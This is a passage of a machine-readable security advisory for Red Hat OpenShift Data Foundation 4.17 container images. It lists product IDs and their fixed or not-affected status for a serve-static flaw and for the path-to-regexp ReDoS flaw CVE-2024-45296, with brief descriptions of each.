"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "serve-static: Improper Sanitization in serve-static", }, { cve: "CVE-2024-45296", cwe: { id: "CWE-1333", name: "Inefficient Regular Expression Complexity", }, discovery_date: "2024-09-09T19:20:18.127723+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2310908", }, ], notes: [ { category: "description", text: "A flaw was found in path-to-regexp package, where it turns path strings into regular expressions. In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance. Because JavaScript is single-threaded and regex matching runs on the main thread, poor performance will block the event loop and lead to a denial of service (DoS).", title: "Vulnerability description", }, { category: "summary", text: "path-to-regexp: Backtracking regular expressions cause ReDoS", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", ], known_not_affected: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", 